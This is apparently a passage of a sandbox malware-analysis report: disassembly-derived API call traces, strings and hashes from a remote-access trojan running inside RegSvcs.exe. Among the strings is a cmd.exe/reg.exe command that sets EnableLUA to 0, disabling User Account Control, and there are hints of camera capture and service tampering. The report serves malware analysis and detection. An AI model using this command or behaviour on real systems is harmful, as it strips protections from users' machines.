                                    • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                      • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: H_prologSleep
                                    • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                    • API String ID: 3469354165-3054508432
                                    • Opcode ID: 180fc6eb72b116d827b034a49e1adc61e94a7e22018ecd165a1f07ef89b3401f
                                    • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                    • Opcode Fuzzy Hash: 180fc6eb72b116d827b034a49e1adc61e94a7e22018ecd165a1f07ef89b3401f
                                    • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: __cftoe
                                    • String ID:
                                    • API String ID: 4189289331-0
                                    • Opcode ID: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
                                    • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                    • Opcode Fuzzy Hash: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
                                    • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                    • String ID:
                                    • API String ID: 493672254-0
                                    • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                    • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                    • Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                    • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: __alldvrm$_strrchr
                                    • String ID: PkGNG
                                    • API String ID: 1036877536-263838557
                                    • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                    • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                    • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                    • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                    APIs
                                    • GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                    • _free.LIBCMT ref: 0044824C
                                    • _free.LIBCMT ref: 00448274
                                    • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                    • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                    • _abort.LIBCMT ref: 00448293
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: ErrorLast$_free$_abort
                                    • String ID:
                                    • API String ID: 3160817290-0
                                    • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                    • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                    • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                    • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                    • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                    • Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                    • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                    • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                    • Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                    • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                    • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                    • Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                    • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID:
                                    • String ID: PkGNG
                                    • API String ID: 0-263838557
                                    • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                    • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                    • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                    • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                    • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                                    • CloseHandle.KERNEL32(?), ref: 00404DDB
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                    • String ID: PkGNG
                                    • API String ID: 3360349984-263838557
                                    • Opcode ID: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
                                    • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                    • Opcode Fuzzy Hash: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
                                    • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                    • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                    • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    • API ID: File$CloseCreateHandleSizeSleep
                                    • String ID: XQG
                                    • API String ID: 1958988193-3606453820
                                    • Opcode ID: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                                    • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                    • Opcode Fuzzy Hash: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                                    • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                    APIs
                                    • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                    • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                    • GetLastError.KERNEL32 ref: 0041D580
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Similarity
                                    • API ID: ClassCreateErrorLastRegisterWindow
                                    • String ID: 0$MsgWindowClass
                                    • API String ID: 2877667751-2410386613
                                    • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                    • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                    • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                    • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                    APIs
                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                    • CloseHandle.KERNEL32(?), ref: 004077AA
                                    • CloseHandle.KERNEL32(?), ref: 004077AF
                                    Strings
                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                    • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Similarity
                                    • API ID: CloseHandle$CreateProcess
                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                    • API String ID: 2922976086-4183131282
                                    • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                    • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                    • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                    • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                    Strings
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, xrefs: 004076C4
                                    • SG, xrefs: 004076DA
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    • API String ID: 0-4153219426
                                    • Opcode ID: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                                    • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                    • Opcode Fuzzy Hash: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                                    • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                    • SetEvent.KERNEL32(?), ref: 0040512C
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                    • CloseHandle.KERNEL32(?), ref: 00405140
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Similarity
                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                    • String ID: KeepAlive | Disabled
                                    • API String ID: 2993684571-305739064
                                    • Opcode ID: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                                    • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                    • Opcode Fuzzy Hash: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                                    • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                    APIs
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                    • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                    • Sleep.KERNEL32(00002710), ref: 0041AE07
                                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Similarity
                                    • API ID: PlaySound$HandleLocalModuleSleepTime
                                    • String ID: Alarm triggered
                                    • API String ID: 614609389-2816303416
                                    • Opcode ID: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
                                    • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                    • Opcode Fuzzy Hash: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
                                    • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                    • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                                    • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                                    • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                                    Strings
                                    • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Similarity
                                    • API ID: Console$AttributeText$BufferHandleInfoScreen
                                    • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                    • API String ID: 3024135584-2418719853
                                    • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                    • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                    • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                    • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                    • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                    • Opcode Fuzzy Hash: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                    • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                    APIs
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                    • _free.LIBCMT ref: 00444E06
                                    • _free.LIBCMT ref: 00444E1D
                                    • _free.LIBCMT ref: 00444E3C
                                    • _free.LIBCMT ref: 00444E57
                                    • _free.LIBCMT ref: 00444E6E
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Similarity
                                    • API ID: _free$AllocateHeap
                                    • String ID:
                                    • API String ID: 3033488037-0
                                    • Opcode ID: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
                                    • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                    • Opcode Fuzzy Hash: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
                                    • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                    APIs
                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                    • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                      • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Similarity
                                    • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 4269425633-0
                                    • Opcode ID: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                                    • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                    • Opcode Fuzzy Hash: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                                    • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                    • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                    • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                    • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                    • _free.LIBCMT ref: 0044F3BF
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Similarity
                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                    • String ID:
                                    • API String ID: 336800556-0
                                    • Opcode ID: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                                    • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                    • Opcode Fuzzy Hash: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                                    • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                    APIs
                                    • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
                                    • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C459
                                    • WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C46A
                                    • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C477
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Similarity
                                    • API ID: File$CloseHandle$CreatePointerWrite
                                    • String ID:
                                    • API String ID: 1852769593-0
                                    • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                    • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                    • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
